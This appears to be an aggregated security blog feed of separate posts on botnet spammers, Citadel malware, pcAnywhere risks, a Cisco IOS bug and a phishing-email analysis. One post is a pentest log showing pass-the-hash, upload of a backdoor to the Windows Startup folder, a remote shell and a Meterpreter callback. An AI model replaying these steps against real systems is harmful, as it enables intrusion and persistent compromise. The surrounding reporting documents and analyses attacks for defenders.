Bits and Bytes

Security experts have spotted drive-by malware attacks exploiting a critical security hole in Windows that Microsoft recently addressed with a software patch. Separately, Symantec is warning users of its pcAnywhere remote administration tool to either update or remove the program, citing a recent data breach at the security firm that the company said could help attackers find holes in the aging software title.

On Thursday, Trend Micro said it had encountered malware that leverages a vulnerability in the way Windows handles certain media files. This is a browse-and-get-owned flaw for Windows XP, Windows Vista, Windows Server 2003 and 2008 users, meaning these folks can infect their machines merely by browsing to a hacked or malicious site hosting a specially crafted media file. If you run Windows and have delayed installing this month’s updates, consider taking care of that now by visiting Windows Update.

Trend Micro competitor Symantec also issued a warning this week — about threats to its own software. Responding to a now widely-publicized break-in that resulted in the theft of its proprietary source code in 2006, Symantec issued a 10-page white paper with recommendations for customers still using this software. The company says fewer than 50,000 people are still using pcAnywhere, but those who are should consider applying newly-released updates, or removing the program altogether.

From that whitepaper (PDF):

With this incident pcAnywhere customers have increased risk. Malicious users with access to the source code have an increased ability to identify vulnerabilities and build new exploits. Additionally, customers that are not following general security best practices are susceptible to man-in-the-middle attacks which can reveal authentication and session information. General security best practices include endpoint, network, remote access, and physical security, as well as configuring pcAnywhere in a way that minimizes potential risks.

At this time, Symantec recommends disabling the product until Symantec releases a final set of software updates that resolve currently known vulnerability risks. For customers that require pcAnywhere for business critical purposes, it is recommended that customers understand the current risks, ensure pcAnywhere 12.5 is installed, apply all relevant patches as they are released, and follow the general security best practices discussed herein.

On Thursday, Symantec released updates to address at least three security vulnerabilities in pcAnywhere 12.5 for Windows. The company said it plans to issue additional updates for pcAnywhere 12.0, pcAnywhere 12.1 and pcAnywhere 12.5, although it didn’t say precisely when those updates would be available.

It’s generally a bad idea to leave remote administration tools like pcAnywhere always on and always accessible via the Internet. If you must use them, I’d strongly recommend limiting allowable connections to specific computer names or Internet addresses, limiting the number of consecutive logon attempts, and — if feasible– incorporating some type of token based solution.

Microsoft on Monday named a Russian man as allegedly responsible for running the Kelihos botnet, a spam engine that infected an estimated 40,000 PCs. But closely held data seized from a huge spam affiliate program suggests that the driving force behind Kelihos is a different individual who commanded a much larger spam empire, and who is still coordinating spam campaigns for hire.

Kelihos shares a great deal of code with the infamous Waledac botnet, a far more pervasive threat that infected hundreds of thousands of computers and pumped out tens of billions of junk emails promoting shady online pharmacies. Despite the broad base of shared code between the two malware families, Microsoft classifies them as fundamentally different threats. The company used novel legal techniques to seize control over and shutter both botnets, sucker punching Waledac in early 2010 and taking out Kelihos last fall.

On Monday, Microsoft filed papers with a Virginia court stating that Kelihos was operated by Andrey N. Sabelnikov, a St. Petersburg man who once worked at Russian antivirus and security firm Agnitum. But according to the researcher who shared that intelligence with Microsoft — and confidentially with Krebs On Security weeks prior to Microsoft’s announcement — Sabelnikov is likely only a developer of Kelihos.

“It’s the same code with modifications,” said Brett Stone-Gross, a security analyst who came into possession of the Kelihos source code last year and has studied the two malware families extensively.

Rather, Stone-Gross said, the true coordinator of both Kelihos and Waledac is likely another Russian who is well known to anti-spam activists.

WHO IS SEVERA?

A variety of indicators suggest that the person behind Waledac and later Kelihos is a man named “Peter Severa” — known simply as “Severa” on underground forums. For several years running, Severa has featured in the Top 10 worst spammers list published by anti-spam activists at Spamhaus.org (he currently ranks at #5). Spamhaus alleged that Severa was the Russian partner of convicted U.S. pump-and-dump stock spammer Alan Ralsky, and indeed Peter Severa was indicted by the U.S. Justice Department in a related and ongoing spam investigation.

It turns out that the connection between Waledac and Severa is supported by data leaked in 2010 after hackers broke into the servers of pharmacy spam affiliate program SpamIt. The data also include tantalizing clues about Severa’s real identity.

In multiple instances, Severa gives his full name as “Peter North;” Peter Severa translates literally from Russian as “Peter of the North.” (The nickname may be a nod to the porn star Peter North, which would be fitting given that Peter North the spammer promoted shady pharmacies whose main seller was male enhancement drugs).

According to SpamIt records, Severa brought in revenues of $438,000 and earned commissions of $145,000 spamming rogue online pharmacy sites over a 3-year period. He also was a moderator of Spamdot.biz (pictured at right), a vetted-members-only forum that included many of SpamIt’s top earners, as well as successful spammers/malware writers from other affiliate programs such as EvaPharmacy and Mailien.

Severa seems to have made more money renting his botnet to other spammers. For $200, vetted users could hire his botnet to send 1 million pieces of spam; junk email campaigns touting employment/money mule scams cost $300 per million, and phishing emails could be blasted out through Severa’s botnet for the bargain price of $500 per million.

Spamhaus says Severa’s real name may be Peter Levashov. The information Severa himself provided to SpamIt suggests that Spamhaus’s intelligence is not far off the mark.

Severa had his SpamIt earnings deposited into an account at WebMoney, a virtual currency popular in Russia and Eastern Europe. According to a source that has the ability to look up identity information tied to WebMoney accounts, the account was established in 2001 by someone who entered a WebMoney office and presented the Russian passport #454345544. The passport bore the name of a then 26-year-old from Moscow — Viktor Sergeevich Ivashov.

SPAMDOT SECRETS

So where are the clues suggesting that Severa ran Waledac? Krebs On Security also managed to secure a copy of the Spamdot.biz forum, including the private messages for all of its users. On August 27, 2009, Severa sent a private message to a Spamdot.biz user named “ip-server.” Those communications show that the latter had sold Severa access to so-called “bulletproof hosting” services that would stand up to repeated abuse claims from other ISPs. The messages indicate that Severa transacted with ip-server to purchase dedicated servers used to control the operations of the Waledac botnet.

In the private message pictured in the screen shot to the left, Severa writes (translated from Russian):

“Hello, writing to your ICQ, you are not responding.  One of the servers has been down for 5 hours. The one ending on .171.  What’s the problem, is it coming up or not, and when?”

ssh 193.27.246.171
ssh: connect to host 193.27.246.171 port 22: No route to host”

Ip-server must have resolved the outage, because the server that Severa was complaining about — 193.27.246.171 — would be flagged a day later by malware analysts, and tagged as a control server for the Waledac botnet.

There are clues that suggest a relationship between Severa and Kelihos that go beyond similarities in the code that powers the two botnets. Last summer, prior to Microsoft’s takedown of Kelihos, I wrote about another venture that Severa widely advertised on hacker forums: “Sevantivir,” an affiliate program that rewarded hackers for tricking people into installing and ultimately paying for fake antivirus software.

In that story, I cited research by French malware investigator and blogger Steven “Xylitol” K, who found that the installer program that Severa was giving to affiliates seeded infected PCs with both fake antivirus and a copy of Kelihos. From that story:

“Steven discovered that the malicious installer that Sevantivir affiliates were asked to distribute was designed to download two files. One was a fake AV program called Security Shield. The other was a spambot that blasts junk email pimping Canadian Pharmacy/Glavmed pill sites. The spambot is detected by Microsoft’s antivirus software as Win32.Kelihos.b. According to Microsoft, Kelihos.b shares large portions of its code with the Waledac worm, an infamous worm that for several years was synonymous with Canadian Pharmacy spam.”

It’s not clear what botnet infrastructure he is using now, but Severa is still the spam service administrator on several underground forums, pimping his spam services, remarkably under most of the same prices he offered them for in 2008.

Contacted via instant message and presented with the evidence, Severa denied everything, saying he only did small opt-in mailings, had never used a botnet, and had been out of the business for years. When pressed about his fake antivirus affiliate program, Severa said he didn’t realize his antivirus program was fake, and that he didn’t know anyone named Sabelnikov, or even Ralsky. When presented with the screen shot below — which shows Severa complaining on Spamdot about how his broker ran away and that he was faced to find a new sponsor for spamming penny stocks just days after Ralsky’s arrest in Jan. 2008 — Severa said someone else must have been using his Spamdot account.

“The truth is that some people sharing servers, spamdot account and some other forum accounts [in] those years,” he explained. He gave the same reply when asked about the screen shot showing his renting the server used to control Waledac.

Kelihos may not be completely gone. Stone-Gross said he recently uncovered a malware sample that appears to be another installer for Kelihos.

“The guys running these botnets are making lots of money,” Stone-Gross said. “They’re not just going to sit back and say, ‘Oh no, they took down our botnet, let’s give up on our business.’ They’ll use pay-per-install affiliate programs to reinfect more machines and bring the botnet right back up.”

Last Month at the SANS360, I promised the release of the Timeline Template to be used to automatically colorize your timelines.Review on Timeline Creation:1.Mounting Evidence Files 2.Automated Timeline Creation3. Targeted Timeline Creation TIMELINE CREATION CHEAT SHEET The Timeline …

In a surprise filing made late Monday, Microsoft said a former technical expert at a Russian antivirus firm was the person responsible for operating the Kelihos botnet, a global spam machine that Microsoft dismantled in a coordinated takedown last year.

In a post to the Official Microsoft Blog, the company identified 31-year-old Andrey N. Sabelnikov of St. Petersburg, Russia as responsible for the operations of the botnet. Microsoft’s amended complaint (PDF) filed with the U.S. District Court for the Eastern District of Virginia states that Sabelnikov worked as a software engineer and project manager at a company that provided firewall, antivirus and security software.

Microsoft doesn’t specify where Sabelnikov worked, but according to Sabelnikov’s LinkedIn page, from 2005 to 2007 he was a senior system developer and project manager for Agnitum, a Russian antivirus firm based in St. Petersburg. One of the company’s most popular products is Outpost, a free firewall program. Sabelnikov’s profile says he most recently worked for a firm called Teknavo, which makes software for companies in the financial services sector.

A source close to the investigation told Krebs On Security that Sabelnikov’s alleged role was discovered after a security researcher obtained a copy of the source code to Kelihos. The researcher noticed that the source contained debug code that downloaded a Kelihos malware installer from the domain sabelnikov.net, a photography site registered to Sabelnikov’s name. That site currently links to Sabelnikov’s profile page at Russian social networking site Vkontakte.ru, which includes the same pictures found in the LinkedIn profile mentioned above.

Microsoft doesn’t mention the source code discovery in its amended complaint, but it does reference the availability of new evidence in naming Sabelnikov. The company said it also had cooperation from the original defendants in the case — Dominique Alexander Piatti and the dotFREE Group, which owned the domains allegedly used to control the botnet.

Update, Jan. 27 9:38 a.m. ET: Sabelnikov on Thursday posted a response on his blog denying Microsoft’s allegations, saying he had never participated in the management of botnets and any other similar programs. Sabelnikov also stated that he has just returned from a business trip to the United States earlier this month. Interestingly, he says he arrived in the U.S. on Jan. 21, and stayed for two days — meaning he left either the same day or a day after Microsoft filed its brief with the court.

Also on Thursday, I published a follow-up investigation which suggests that Kelihos and its predecessor Waledac were almost certainly the work of a well-known spammer named Peter Severa.

I ended up having to use the smb/upload_file module on a pentest.  I was able to get the local admin hashes but for some reason the psexec module wouldn’t get code execution, it would act like it would work but wasn’t.  So we decided to push a binary, use winexe that was modified to pass the hash to exec the binary as needed.  It went something like this…##################################################
# add a route to the 10.x network thru session 1
##################################################

msf  exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added

#######################################################
# psexec wouldnt work. AV eating metsvc most likely…
# used smb/upload_file to place a binary on the box
######################################################
msf  exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info

    Name: SMB File Upload Utility
    Module: auxiliary/admin/smb/upload_file
    Version: 10394
    License: Metasploit Framework License (BSD)
    Rank: Normal

Provided by:
  hdm

Basic options:

  Name      Current Setting                               Required  Description
  —-      —————                               ——–  ———–
  LPATH                     yes       The path of the local file to upload
  RHOST                     yes       The target address
  RPATH                     yes       The name of the remote file relative to the share
  RPORT     445             yes       Set the SMB service port
  SMBSHARE  C$             yes       The name of a writeable share on the server

Description:
  This module uploads a file to a target share and path. The only
  reason to use this module is if your existing SMB client is not able
  to support the features of the Metasploit Framework that you need,
  like pass-the-hash authentication.

msf  auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
smsf  auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH “C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe”
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe…
[*] Connecting to the server…
[*] Mounting the remote share \\1.2.3.4\C$’…
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe…
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe…
[*] Auxiliary module execution completed

################################################
#Set up a portforward to talk to hosts via SMB
################################################

meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445

#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################

user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 “cmd”
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : inside.company.com
        IP Address. . . . . . . . . . . . : 1.2.3.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 1.2.3.254

C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0007-B088

 Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup

01/13/2012  03:55 PM             .
01/13/2012  03:55 PM             ..
01/13/2012  03:55 PM            13,616 msf_backdoor.exe
               1 File(s)         13,616 bytes
               2 Dir(s)  241,661,345,792 bytes free

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>

[*] 5.5.5.5:4889 Request received for /INITM…
[*] 5.5.5.5:4889 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012

Underground hacker forums are full of complaints from users angry that a developer of some popular banking Trojan or bot program has stopped supporting his product, stranding buyers with buggy botnets. Now, the proprietors of a new ZeuS Trojan variant are marketing their malware as a social network that lets customers file bug reports, suggest and vote on new features in upcoming versions, and track trouble tickets that can be worked on by the developers and fellow users alike.

The ZeuS offshoot, dubbed Citadel and advertised on several members-only hacker forums, is another software-as-a-service malware development. Its target audience? Those frustrated with virus writers who decide that coding their next creation is more lucrative and interesting than supporting current clients.

“Its no secret that the products in our field — without support from the developers — result in a piece of junk on your hard drive. Therefore, the product should be improved according to the wishes of our customers,” Citadel’s developers claim in an online posting. “One problem is that you have probably experienced developers who ignore your instant messages, because there are many customers but there is only one developer.”

In the following excerpt, taken from a full description of Citadel’s innovations, the developers of this malware strain describe its defining feature as a social networking platform for malware users that is made available through a Web-based portal created by the malware itself.

“We have created for you a special system — call it the social network for our customers. Citadel CRM Store allows you to take part in product development in the following ways:

- Report bugs and other errors in software. All tickets are looked at by technical support you will receive a timely response to your questions. No more trying to reach the author via ICQ or Jabber.

-Each client has the right to create an unlimited number of applications within the system. Requests can contain suggestions on a new module or improvements of existing module. Such requests can be public or private.

-Each client has a right to vote on new ideas suggested by other members and offer his/her price for development of the enhancement/module. The decision is made by the developers on whether to go forward with certain enhancement or new module depending on the voting results.

-Each client has the right to comment on any application and talk to any member. Now it is going to be interesting for you to find partners and like-minded people and also to take active parts in discussions with the developers.

- You can see all stages of module development, if it is approved other members. We update the status and time to completion.

- You may pay a deposit, if module is approved (50%). After the deposit is paid by the members, the project starts moving forward, so that the money is paid directly to coders and there will be no laziness or inaction. Everything is clear: every stage of development is thoroughly shown.

-Easy jabber [instant message] notification of new member or developer comments, or the availability of new custom applications.

Citadel may be the first notable progeny of ZeuS since the ZeuS source code was leaked online last year. The authors claim that it includes a number of bug fixes for the most recent ZeuS version, including full support for grabbing credentials from victims using Google Chrome. Also bundled with this update is a component that can record and transmit videos of the victim’s screen activity.

The basic Citadel package — a bot builder and botnet administration panel — retails for $2,399 + a $125 monthly “rent,” but some of its most innovative features are sold as a la carte add-ons. Among those is a $395 software module that allows botmasters to sign up for a service which automatically updates the bot malware to evade the last antivirus signatures. The updates are deployed via a separate Jabber instant message bot, and each update costs an extra $15.

Citadel also boasts a feature that hints at its creator’s location(s). According to the authors, if the malware detects that the victim’s machine is using a Russian or Ukrainian keyboard, it will shut itself down. This feature is almost certainly a hedge to keep the developers out of trouble: Authorities in those regions are far less likely to pursue the Trojan’s creators if there are no local victims.

It will be interesting to see if these malware developers hold true to their word. The growth of a more real-time, user-driven and crowdsourced malicious software market would be a truly disturbing innovation. For now, the miscreants behind Citadel appear upbeat about their chances of ushering in such a reality.

“It’s very interesting for us to work with our clients,” they wrote in an online forum posting. “A lot of authors write in forums that they ‘support the product,’ but at the end the updates only come out once every three months or the author disappears forever. Problem is in author’s motivation. You support us, we support you. It is easy.”

Sigh. I’m getting old.

I recently read a post at ReadWriteWeb by Scott Fulton, III Mozilla’s Plan for Keeping Firefox Relevant in a Post-Browser Web.

That day I became dangerously close to becoming the old technologist guy equivalent of the “You kids get off my lawn!” guy we all probably know.

What is Mozilla doing to my beloved Firefox of the near and dear “future”?

• HTML5 runtime functionally support (for driving in-browser, non system proprietary, web-apps).
• Extending cloud-based services.
• An on-line identity management system called “BrowserID”. (How it works)
• and more stuff imagined and planned.

That left me grumbly then John Paul Titlow at ReadWriteWeb posted this Mozilla: We’re About to Grab More Data About You, But Here’s How We’ll Keep It Safe.

Mozilla has some big plans up its sleeve in 2012. The non-profit open source foundation is planning some features for its Firefox Web browser and beyond that will require greater access to user data. In a blog post, the organization explains exactly how it intends to use and handle that data. In short, very carefully.

The blog post John Paul references is up at Mozilla Privacy Blog: Mozilla to Offer New User-Centric Services in 2012.

While I recognize and appreciate the very challenging work that browser developers have (not just at Mozilla), I think I’m grumbly for two primary reasons here with Mozilla.

First, I was a very early adopter of Firefox. It was quicker than IE. It was slimmer (memory and feature bloat) than IE. It was more secure than IE. And I could plug all kinds of things into it (Add-Ons/Extensions) to customize it with only those features and capabilities that helped make my experience on the Web better. If I didn’t need it, I didn’t’ install it and thus kept the Firefox browser lean and mean.

I really do “get it” with the coming exciting wave of “web-based apps” and running them in your browser and the security it will now bring (think JavaScript/Flash). It’s the next “big” evolutionary shift for the Internet. Really. Who of us really still think of the Internet as being just a super-large reference library and world-wide town-square/market anymore? It’s now a world-wide commercial mall and entertainment center. Really. Oh sure, you can still go down that wing none of the hip kids hang out at and find the pubs where the old-timers hang out, a few plain coffee-bars where the wanna-be journalist “bloggers” hang out and trade stories of yore, and maybe go into that virtual bookstore of arcane knowledge and technical minutia that some of us still love. But really. None of the cool companies and consumers come down this way. They demand different things. Better things. A new paradigm of interaction and operation.

Sigh.

So the browser needs to change to keep up. Bigger, more embedded features. Probably faster. Probably louder too with base-boost and kickers. Hopefully the security alarm on it will be better too.

Secondly, my bones ache every time a new ID management system comes out that gets closer to being a cloud-based requirement. I know, it’s for my own good their doing it. Really. I’m so much safer having more and more of my user data off-loaded to the Webs and Clouds. Clearly the higher and higher it goes away from me the safer and safer and harder and harder it must be for the underground dwellers to grab it. Right? What? Oh, I have to just “trust” everyone “out-there” with my user data and All-In-One credentials and stuff. I’m sure everyone will be honorable and diligent in keeping my account and passwords and user data safe and secure. Nobody ever gets their customer’s account/password information lost to hackers, or on a laptop, or on a USB stick anymore, or via a network traffic hack. Right? That was just in the “old-days”. These new solutions are really, really safer.

I get it. I do. And I appreciate everyone working so hard to keep Firefox and my web experience so much more safe, more secure, and more powerful than ever before. I appreciate modern AC over running a fan past a block of ice to cool my house. Really. And who doesn’t like the convenience of a cellular smart-phone over a plain-old copper analog line service wired into your house?

My browser is growing up, and the world it is living is changing as fast as it is.

Sigh.

I still use (and probably will) Firefox as my personal “production” web-browser of choice. It works for me and my way of being productive.  That said, when I’m surfing the web, give me Chrome. I guess I have to still drive the daily commuter into work and back, but yeah, on the weekends I like to pull out the latest sports car for tooling around the highways and byways and back roads.

You know, I was a very early adopter of Chrome. It was quicker than Firefox. It was slimmer (memory and feature bloat) than Firefox. It was more secure than Firefox. And I could plug all kinds of things into it (Add-Ons/Extensions) to customize it with only those features and capabilities that helped make my experience on the Web better. If I didn’t need it, I didn’t’ install it and thus kept the Chrome browser lean and mean. In fact, I hear from the Google Chrome Blog that Chrome is about to get more Speed and Security with pre-rendering of pages and enhanced URL and file-download checking. What’s not to like about that!

I gotta admit, high-school senior (these kids again!) Danny Stieben’s timely post at MakeUseOf blog probably sums it up right: Why It Eventually Won’t Matter What Browser You Use [Opinion].

It won’t. Honestly. It just won’t. Time to face the music and admit I’ve got to adopt the new (browser/web) core “technology” design model and landscape or I’ll become irrelevant and end up spending the rest of my days in that dilapidated and decaying wing of the New Web Mall hanging out with the other curmudgeons and making fun of those really dorky guys and gals still using AOL web-mails, web portal home-pages with their IE 5/6 and Firefox 3 web-browsers. Seriously? Who uses those anymore?!! Get a clue.

Here. Spin a wheel and take a pick. Take one. Use one. Just don’t become friends or companions. Someone’s bound to change and the relationship will sour, and there will be a new favorite.

• Internet Explorer – Web Browser for Microsoft Windows
• Internet Explorer 10 – Test Drive
• Google Chrome – Get a fast new browser. For PC, Mac, and Linux
• Get More From Your Firefox — Mobile, Add-ons & Other Stuff
• Apple – Safari – Browse the web in smarter, more powerful ways.
• Opera browser – Faster & safer internet
• Category:Windows web browsers – Wikipedia
• List of Web browsers for Windows – Web Developer Notes

The GSD Curmudgeon ends with these moving and inspiring words of wisdom and perspective on the whole thing.

Great Motivational Speech – It Just Doesn’t Matter – YouTube

Ok…soap box away. We will now return to regular GSD programming.

–Claus V.

When I configured this Cisco router (IOS version 15.0(1)M5) with dynamic dns, it failed to properly update its public IP address on the dynamic dns site. Turning on debugging (debug ip ddns update) revealed an authentication issue:

*Jan 20 22:53:55.591: HTTPDNSUPD: DATA START badauth

A simple test confirmed what I suspected: IOS truncates the password. In can’t be longer than 15 characters.

Here’s the config of my test, with username test and a 20 character password:

And here’s what the web server receives:

The password received by the webserver is 0123456789abcde. In other words, IOS has truncated the password to the first 15 characters and included it in headers of the http(s) GET request that updates the dynamic dns info.

It’s possible that the username also gets truncated to 15 characters, however I’ve not tested this.

The Cisco bug ID is CSCtx50249.

I can’t believe I’ve been blogging now (fairly) consistently since 2005. I’ve gone from a peak posting rate of 311 posts in 2007 down to a low of just 40 posts last year in 2011.

Finding the time to blog has grown more and more challenging and I hope the quality and depth of many of my posts has grown over the years as well.

The last two years in particular have been a personal frustration as I have attempted to grow more “present” with my family and community while dealing with the tremendous workload presented in my “real” job that has meant longer hours, later hours, and technical challenges that have conspired to keep my technical processing brain-core on overdrive.

All that said, the biggest problem I had, however, hasn’t been a lack of inspiration, or of time, or of material.

I seriously believe it was the lack of a good desk and by extension, a good workspace.

See, from 2006-2009 a good part of my primary blogging hardware was based on desktop computers at home. First an old Gateway and later a small-form-factor barebones home-build kit.  Both these systems were kept in a nice desk that was located in our library/laundry room.  So I could hole up in the space, have few interruptions, and focus on writing, and blogging, and blogging. Lots of productivity.

In 2006 Lavie bought our first laptop. Then in 2007 Lavie won a Gateway laptop and it became her new laptop and the first one became a backup family pc.  Then in 2009 Lavie  picked up a larger laptop for herself and I took over the Gateway laptop as a secondary system while Alvis took over Lavie’s first one. Though I continued to patch and upgrade the SFF desktop pc I used, the Gateway laptop really became my primary home computing device and blogging platform. And in late 2010 I finally obtained my own “dream” notebook.

I sincerely believe the shift from using a desktop pc (at a desk) to a laptop (wherever) is what led to the biggest hit on my blogging production.

When I sit at a desk I have a productive mindset. When I’m in one of the chairs or couch in our living room I can blog, but it doesn’t feel as natural as just “couch-surfing” the web. I find it hard to build and maintain a writing rhythm if I’m anywhere but in front of a desk.

Since the girls REALLY wanted me to me more present with them and not hidden off in our library area, and I had a laptop, it was very seldom that I found myself in our study and my desk–and in a productive blogging mindset.

I’ve been trying to find a solution to the problem for some time. Unfortunately, the desk in the library while not large, just didn’t seem to lend itself to either our living room décor or function. So I’ve just coped, and the blogging rate has suffered.

Last week I found a cheap trestle-style mini-desk that was perfect in color, style and size for the living room. With minimal rearrangement I was able to place it in the living room along with a nice matching traditional wooden chair with a faux-leather seat cushion. It was a great pairing.  While not my favorite in terms of style, it was a perfect pairing of form and function (and price) so I struck while the iron was still hot.

That weekend saw the slew of postings which has almost brought to half-as-many as all I did last year.

Now I have my own elegant and relaxing workspace again to use my laptop at; but still be “present” with Lavie and Alvis after work or on the weekends.

Now the story should end there.

However this weekend Alvis and I finally swapped got around to swapping our desks. These are not to be confused with the new one above.

See, Alvis has been using a large French-country style desk in her room for her homework/TV/laptop/crafting needs.  It is a beautiful desk that has an attached shelving unit over it. Meanwhile my desk (the one in the library I have mentioned already) is an Ikea special with a simple solid wood frame, a side-caddy for a desktop PC and a small pullout drawer that held all those misc. USB cables and PC hardware bits that accumulate.

Alvis in her artsy/interior-design-y mode decided she needed to “open up” the space in her room and swap desks. This way she has more physical room (since mine is smaller) and gain a desk that is more work-bench-like for her crafting. It will also work better for her new machine-sewing hobby and crafting system.

So yesterday we set to work clearing off our desks and emptying them of their contents. Lots of cables to re-manage, lots of missed-dust to remediate. And the desks were swapped.

Alvis’s (new-to-her) desk fit perfectly and holds a small LCD TV that doubles as a second monitor for her laptop. The solid wood surface is more firm for crafting and the lack of a overhead shelving system means she can now feed large lengths of fabric easily across the surface. She did add a small wire-baking-rack to the side of it for storing supplies. Now she has space galore in her room reclaimed.

My (new-to-me) desk is in the study. My second LCD monitor is tucked in a corner when I do decide to work back there and need a second monitor. (I decided it just didn’t fit the living room décor or small desk added there.) It has a USB keyboard/mouse combo as well on the slide-out tray just in case. The (now long-since disconnected until I eventually get around to using it as a SAN server option-1 option-2) SFF PC is tucked away in the side-caddy. The real plus has been getting all my technical books and manuals off the stacks in the library floor and nicely organized in the over-desk shelves. I’ve also got my network hardware (switches/routers) and external hard-drives nicely sitting in their “cubbies” as well. It looks downright nice.

Funny how these things work out…I finally find the perfect desk to get me out of the library, get crazy-productive again (and make both my girls and me harmoniously happy). And the very next weekend I end up creating the super organized and comfy writing-desk/computing-workbench in the man-cave library.

I guess that’s just how we roll around here.

So long-story-short, it’s neither a matter of here or there. Simply expect more blogging this year from the GSD ranch.

–Claus V.

Last weekend I spent some time with extended family helping confirm for them that their on-line email account got hacked and had been used to send some malware-linking spam emails to users in their contact list.

Yesterday our family email account was on the receiving end of someone — possibly — who fell victim to an email account hack as our email address was amongst several others included together receiving the email. I say possibly as none of us recognized the sender’s email address and it wasn’t in any of our address books. Possibly our along with the other’s email addresses had been harvested somehow and this was a fake spamming account. The “show-as” name was definitely non-standard and used some letters that related to that in the subject line.

It was pretty evident to me this was probably a dangerous site to go to, but being curiously-minded, I couldn’t pass up the chance to do some detective work.

The email originated from a yahoo mail account.

The Subject line was baited “ACH Transfer Canceled…” and the display name in the email address contained the letters “NACHA.”

ACH is meant to refer to the “Automated Clearing House” which handled financial transactions in the US overseen by the NACHA.  To most Americans, I’m betting these acronyms mean very little and they would be more taken with a sudden urge to grab some NACHOES instead. Maybe Europeans would be a little more anxious emails purporting to come from ACH and NACHA. I digress.

First thing I looked at was the message header. Lots of goodies there. We can follow the bounce between the yahoo mail sender to our ISP’s email servers. Times/dates of transmission.

Since this was a Yahoo mail account, it appears the header may actually contain the IP address of the the location the mail account was logged into from. This is the first time I have seen this so I need to do more research. The IP associated with this particular email is located in France.

The website IP Address Locator has lots of good tools for locating IP addresses as well as a feature that allows a copy/paste/analyze of email headers.

The content of the email was very thin, a single line with all the text ran together. There is a URL link markup there, however it misses getting all the characters. Hmm.

Toggling between the different modes of viewing email content in Thunderbird reveals odd results. If I look at it in original html mode I see a single line of text with an hyperlink in the middle.

If I view it in simple html most of the text is the same but a few characters are different.

If I view it in plain text, there is nothing showing.

Hovering over the hyperlink displayed shows a URL shortner link. Hmm. Set that aside for a moment.

So I back and look at the full header view again and find this in the message body:

Content-Type: text/html; charset=ISO-8859-5
Content-Transfer-Encoding: base64

Ah! So I copy/paste that large text block that follow that into this base64 online encoder / decoder and get a binary file to download! 

(More regarding content encoding methods here Content-Transfer-Encoding – MSDN, here The Content-Transfer-Encoding Header Field via freesoft.org and here Decoding Internet Attachments – A Tutorial by Michael Santovec.)

Opening that binary file in Notepad++ reveals the html code with the same actual URL embedded.

Guessing here they are using base64 coding for the content to try to get around email scanners.

OK, so let’s check out that URL.

Turns out it is using Google’s own URL shortning service: Google URL Shortener.  More info here. Google URL shortener – Web Search Help

Turns out this is a pretty cool choice from both sides of the security fence. By appending the URL with “.info” at the end of a Goog.le shortened URL we can find out the stats from Goo.gl URL shortener (Google Groups)

This is good from an attacker standpoint as they can easily monitor their success rate on the nibbles of this hook and any “hits” to the actual URL. Researchers can get info as well by monitoring the same info and how fast/long the “click-through” may happen.

Neat isn’t it?

Now that I’ve got the actual long URL that this points to, we can start tossing the URL at some on-line link analysis/scanner tools.

VirusTotal shows both TrendMicro and SCUMWARE.org report the long URL as a Malware/Malicious site.

Quttera reports it as serving up a suspicious javascript content via HTML page code.

Anubis: Analyzing Unknown Binaries provided a deeper review of the URL by capturing Windows system events in a virutal sandbox system. It accesses the Windows registry, mucks with some keys, created a cookie, reads the autoexec.bat file, mods some files and maps dll’s to memory and appears to try to download more stuff. The report is available in HTML, XML, PDF, and TXT formats.  Also, they offer a traffic.pcap file to download so you can examine the network traffic generated and perform any NFA you want to do.  This site/tool rocks from a depth of information standpoint.

urlQuery gives some more report feedback when it is sandboxed. Lots of Java script stuff. Another strong URL analysis reporting site.

Trying it a few more times changing the browser type/java version/flash version gets different results and the URL serving code reflects all kinds of different IP’s each time so that long URL seems to be hosted at a dynamic IP host allowing it to bounce around (serving up HTTP redirects) and serve up the malware code depending on platform from all over the place making it harder to track down the source.

urlQuery actually identified the network traffic code as being detected as Blackhole exploit kit v1.2 HTTP GET request.  Another clue.

